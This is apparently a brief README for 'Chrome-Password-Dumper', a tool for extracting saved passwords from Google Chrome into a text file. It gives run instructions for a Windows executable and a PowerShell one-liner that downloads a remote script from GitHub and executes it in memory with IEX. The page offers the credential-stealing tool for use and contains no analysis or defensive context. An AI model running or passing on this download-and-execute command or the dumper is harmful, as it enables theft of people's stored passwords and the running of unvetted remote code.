Home

Awesome

Chrome-Password-Dumper

For Windows version simply run chrome.exe to dump the passwords to a text file.

For powershell version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')

Chrome must be closed before running the PoC